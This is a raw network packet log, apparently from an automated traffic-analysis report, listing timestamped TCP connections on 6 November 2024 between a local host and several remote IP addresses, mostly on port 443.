                                                                                                                                              Nov 6, 2024 16:55:25.517008066 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.517044067 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.517047882 CET44349753159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.517143965 CET49753443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.523880959 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.523907900 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.523997068 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.524207115 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.524223089 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.525116920 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:25.625781059 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.625808001 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.625891924 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.625909090 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.625943899 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.626641035 CET49758443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.626661062 CET44349758159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.628303051 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.628324032 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.628377914 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.628406048 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.628434896 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.629067898 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.629076958 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.629121065 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.629137993 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.629179955 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.629935026 CET49757443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.629965067 CET44349757159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.630635023 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.630678892 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.630759954 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.630987883 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.631000996 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.632653952 CET49756443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.632671118 CET44349756159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.633332968 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.633383989 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.633446932 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.633721113 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.633739948 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.634598017 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.634639978 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.634707928 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.635021925 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.635037899 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.635654926 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.635693073 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.635759115 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.635941982 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.635961056 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.646951914 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.647367954 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.647439003 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:25.647742033 CET49760443192.168.2.18169.150.221.147
                                                                                                                                              Nov 6, 2024 16:55:25.647758961 CET44349760169.150.221.147192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.665409088 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.665483952 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.665493011 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.665503025 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.665524960 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.665564060 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.665577888 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.665605068 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.665627956 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.670981884 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.671015024 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.671102047 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.671109915 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.671149969 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.671171904 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.688884020 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.689001083 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.689106941 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:25.689405918 CET49759443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:25.689423084 CET44349759169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.800002098 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.800028086 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.800146103 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.800162077 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.800218105 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.805176020 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.805193901 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.805303097 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.805314064 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.805382967 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.806881905 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.806899071 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.807001114 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.807012081 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.807094097 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.816330910 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.816349983 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.816469908 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.816469908 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.816481113 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.816551924 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.934950113 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.934995890 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.935175896 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.935193062 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.935255051 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.939167976 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.939215899 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.939273119 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.939280987 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.939333916 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.939333916 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.940365076 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.940392017 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.940466881 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.940474033 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.940495968 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.940542936 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.941185951 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.941205025 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.941312075 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.941318989 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.941373110 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.943921089 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.943928957 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.944025993 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.944036007 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.944093943 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.944245100 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.944264889 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.944312096 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.944318056 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.944371939 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.944371939 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.945369959 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.945393085 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.945465088 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:25.945472956 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:25.945549965 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.069524050 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.069566965 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.069679022 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.069694996 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.069730997 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.069767952 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.069772959 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.069786072 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.069806099 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.069864035 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.069864035 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.069879055 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.069921970 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.073852062 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.073868990 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.073987961 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.073991060 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.074002981 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.074023008 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.074064970 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.074182034 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.074193954 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.074260950 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.074347973 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.074363947 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.074440956 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.074448109 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.074498892 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075129032 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075144053 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075226068 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075233936 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075282097 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075371027 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075381041 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075546980 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075556040 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075609922 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075773954 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075794935 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075850010 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075856924 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075867891 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075891972 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.075934887 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.075954914 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.076019049 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.076025963 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.076045036 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.076092005 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.076107979 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.076113939 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.076153040 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.076174974 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.076175928 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.076220036 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.076462030 CET49754443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.076474905 CET44349754159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.325587988 CET44349761142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.325890064 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:26.325913906 CET44349761142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.326982975 CET44349761142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.327059984 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:26.328166962 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:26.328229904 CET44349761142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.387104034 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:26.387126923 CET44349761142.250.186.132192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.428102016 CET49761443192.168.2.18142.250.186.132
                                                                                                                                              Nov 6, 2024 16:55:26.605159998 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.605427980 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.605529070 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.605544090 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.605698109 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.605716944 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.605894089 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.606096029 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.606327057 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.606416941 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.606566906 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.606648922 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.606662989 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.606728077 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.606730938 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.606971979 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.606987000 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.606987953 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.607003927 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.607089996 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.607215881 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.607223988 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.607275009 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.607568026 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.607944965 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.608097076 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.608110905 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.608189106 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.608242035 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.608318090 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.608403921 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.608624935 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.608717918 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.609028101 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.609086037 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.609155893 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.609164000 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.609241009 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.609250069 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.651091099 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.651094913 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.651117086 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.651331902 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.651339054 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.653074980 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.869596004 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.869630098 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.869679928 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.869688988 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.870981932 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871038914 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.871138096 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.871144056 CET44349763159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871160984 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.871206999 CET49763443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.871216059 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871233940 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871287107 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871318102 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.871347904 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.871632099 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871666908 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871697903 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871718884 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.871730089 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.871773958 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.872627974 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.872646093 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.872689962 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.872701883 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.872714996 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.872764111 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.873754978 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.873866081 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.873910904 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.881047010 CET49766443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.881061077 CET44349766159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.882184029 CET49762443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.882198095 CET44349762159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.882632971 CET49765443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.882654905 CET44349765159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.883456945 CET49764443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.883469105 CET44349764159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.902033091 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.902075052 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:26.902144909 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.903079987 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:26.903095961 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:27.616308928 CET4969280192.168.2.18199.232.210.172
                                                                                                                                              Nov 6, 2024 16:55:27.621954918 CET8049692199.232.210.172192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:27.622029066 CET4969280192.168.2.18199.232.210.172
                                                                                                                                              Nov 6, 2024 16:55:27.778371096 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:27.778667927 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:27.778681993 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:27.779076099 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:27.779485941 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:27.779562950 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:27.779659986 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:27.823334932 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:27.824141979 CET49769443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:28.066437006 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:28.066466093 CET44349769159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:28.066526890 CET49769443192.168.2.18159.69.48.31
